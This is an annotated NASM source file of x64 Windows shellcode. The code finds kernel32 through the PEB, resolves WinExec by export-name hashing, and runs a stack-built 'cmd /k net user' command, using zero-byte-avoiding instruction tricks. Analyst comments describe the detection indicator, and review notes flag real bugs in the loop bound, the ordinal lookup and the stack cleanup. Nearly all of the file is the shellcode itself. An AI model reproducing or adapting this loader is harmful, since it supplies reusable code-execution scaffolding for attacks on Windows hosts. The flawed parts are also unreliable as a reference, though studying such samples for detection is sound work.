; netuser.nasm -- x64 Windows position-independent code (NASM, Intel syntax).
; Resolves kernel32!WinExec by walking the PEB loader list and hashing export
; names, then calls it with the stack-built command line "cmd /k net user".
; Call ABI used for WinExec: Microsoft x64 (rcx, rdx; 32-byte shadow space).
;
; Analyst notes (everything below is visible in this file):
;   - PEB access via gs:[60h] -> Ldr (+18h) -> InMemoryOrderModuleList (+20h),
;     three list hops to reach the kernel32 DllBase
;   - export-name hash constant 0x79cb7 = rol-2/add hash of "WinExec" (HashLoop)
;   - two 8-byte immediates spelling "cmd /k net user" (InvokeWinExec)
;   - runtime effect: a cmd.exe process with command line "cmd /k net user",
;     i.e. a local-account listing; that process-creation event is the indicator
bits 64
section .text
global _start
_start:
push rbp
mov rbp, rsp
sub rsp, 40h                      ; 64-byte local area, addressed below via rbp
xor r11, r11
; ### reserve memory for local variables ###
; All slots are zeroed first; only the first four are read back later.
; 08h: Number of functions   (export dir + 14h)
; 10h: Address table         (VA)
; 18h: Name pointer table    (VA)
; 20h: Ordinal table         (VA)
; 28h: not used (pointer to WinExec string)
; 30h: not used (address to WinExec function)
; 38h: reserved
mov [rbp - 08h], r11
mov [rbp - 10h], r11
mov [rbp - 18h], r11
mov [rbp - 20h], r11
mov [rbp - 28h], r11
mov [rbp - 30h], r11
mov [rbp - 38h], r11
; ### find kernel32.dll base ###
; peb = gs + 60h                   (r11 is 0 here, so gs:[r11 + 60h] is gs:[60h])
; ldr = peb + 18h
; ModuleList = ldr + 20h           (loads InMemoryOrderModuleList.Flink)
; ModuleList -> Process            (1st entry: the host executable)
; ModuleList -> NTDLL              (2nd entry)
; ModuleList -> KERNEL32 + 20h     (3rd entry; +20h from InMemoryOrderLinks = DllBase)
; kernel32 base -> r8              (earlier comment said rbx; the code keeps the base
;                                   in r8, which stays live through the export walk)
; Assumes the usual load order exe -> ntdll -> kernel32; nothing here checks names.
mov r11, gs:[r11 + 60h]
mov r11, [r11 + 18h]
mov r11, [r11 + 20h]
mov r8, [r11]
mov r11, [r8]
mov r11, [r11 + 20h]
mov r8, r11                       ; r8 = kernel32 image base
; ### find export table ###
; base + 0x3c = RVA PE Signature   (e_lfanew)
; RVA PE Signature + base = VA PE Signature
; VA PE Signature + 0x88 = RVA Export Table   (PE32+ data directory[0])
; RVA Export Table -> r11d         (earlier comment said rax; rax only holds the 0x88 offset)
; RVA Export Table + base = VA Export Table
sub rax, rax                      ; rax = 0
mov r11d, [r8 + 0x3c]
add r11, r8
mov al, 88h                       ; rax = 0x88, built from a byte write (presumably to keep
                                  ; the encoding free of zero bytes -- not verified here)
mov r11d, [r11 + rax]
add r11, r8                       ; r11 = export directory VA
; ### extract data and save in local variables ###
; Export Table + 0x14 = Number of Functions
; Export Table + 0x1c = RVA Address Table
; Export table + 0x20 = RVA Name Pointer Table
; Export Table + 0x24 = RVA Ordinal Table
; RVA Address Table + Base = VA Address Table
; RVA Name Pointer Table + Base = VA Name Pointer Table
; RVA Ordinal Table + Base = VA Ordinal Table
mov eax, [r11 + 0x14]
mov [rbp - 8h], rax
mov eax, [r11 + 0x1c]
add rax, r8
mov [rbp - 10h], rax
mov eax, [r11 + 0x20]
add rax, r8
mov [rbp - 18h], rax
mov eax, [r11 + 0x24]
add rax, r8
mov [rbp - 20h], rax
mov r11, 0xFFFFFFFFFFFFFFFF
add r11, 1                        ; r11 = 0 (two-instruction zero, same remark as mov al above)
sub rax, rax
mov eax, [rbp - 8h]               ; rax = NumberOfFunctions, used as a down-counter
mov r10, [rbp - 18h]              ; r10 = current slot in the name pointer table
; NOTE(review): the loop bound is NumberOfFunctions (+14h) but the walk is over the
; name pointer table, whose length is NumberOfNames (+18h); if NumberOfFunctions is
; larger and no name matches, the loop reads past the end of the name table.
findFuncPos:
xor rbx, rbx                      ; ebx = running hash of the current export name
mov r11d, [rbp - 8h]
sub r11d, eax                     ; r11 = index of the current name (total - remaining)
mov edx, [r10]
add rdx, r8                       ; rdx = name VA
HashLoop:
mov rdi, 0xFFFFFFFFFFFFFFFF
add rdi, 1                        ; rdi = 0, so the byte written to dil is zero-extended
mov dil, [rdx]
test dil, dil
jz HashCompare                    ; NUL terminator: name fully hashed
rol ebx, 162                      ; count is masked to 5 bits for a 32-bit operand: 162 mod 32 = 2
add ebx, edi                      ; hash = rol(hash, 2) + c
inc rdx
jmp HashLoop
HashCompare:
cmp ebx, 0x79cb7                  ; rol-2/add hash of "WinExec"
je WinExecFound
add r10, 4                        ; next name RVA
lea rax, [rax - 1]                ; rax-- without touching flags
;cmp rax, 0
test rax, rax
;jnz findFuncPos
jnz findFuncPos
jmp exit                          ; no export matched the hash
WinExecFound:
; load ordinal_table
; load address_table
; calculate WinExec ordinal
; calculate WinExec RVA
; calculate WinExec VA
; move WinExec VA into rax
; NOTE(review): ax receives the 16-bit ordinal but is not read afterwards; the
; address-table lookup below indexes with r11, the name index from findFuncPos,
; which only equals the ordinal when the ordinal table is an identity mapping.
mov rax, [rbp - 20h]
mov rdi, [rbp - 10h]
mov ax, [rax + r11 * 2]           ; 16-bit write; upper bits of rax keep the ordinal-table VA
mov r11d, [rdi + r11 * 4]
add r11, r8
mov rax, r11                      ; rax = resolved function VA
InvokeWinExec:
xor rcx, rcx
xor rdx, rdx
push rcx                          ; 8 zero bytes: terminator for the string built below
; begin stacked_command
; The two immediates read little-endian as "et user" + 11h and "cmd /k n"; the
; shl/shr pair strips the 11h filler byte so the stack holds "cmd /k net user\0".
mov rcx, 0x1172657375207465 ; et user
shl rcx, 8
shr rcx, 8
push rcx
mov rcx, 0x6e206b2f20646d63 ; cmd /k n
push rcx
; end stacked_command
; rcx = command                    (lpCmdLine = rsp, first MS x64 argument)
; uCmdShow = 1 = SW_SHOWNORMAL     (earlier comment said SW_SHOWDEFAULT, which is 10)
; 16-byte Stack Alignment
; STACK + 32 Bytes (shadow spaces)
; call WinExec
mov rcx, rsp
mov dl, 0x1
and rsp, -16
sub rsp, 32
call rax
; clear stack
; local variables
; pushes for ebp and WinExec
; pushes for WinExec invokation
; NOTE(review): 38h + 18h + 8h = 58h undoes sub rsp,40h plus the three pushes, but
; not the 32-byte shadow space or the alignment drop from `and rsp, -16`, so rsp is
; still below the saved-rbp slot when pop/ret execute. "pushes for ebp" is also
; misleading: rbp was pushed before rbp was set, so it sits above rbp, not below.
add rsp, 38h
add rsp, 18h
add rsp, 8h
pop rbp
ret
exit:
ret                               ; not-found path: returns with the frame still set up (rsp = rbp - 40h)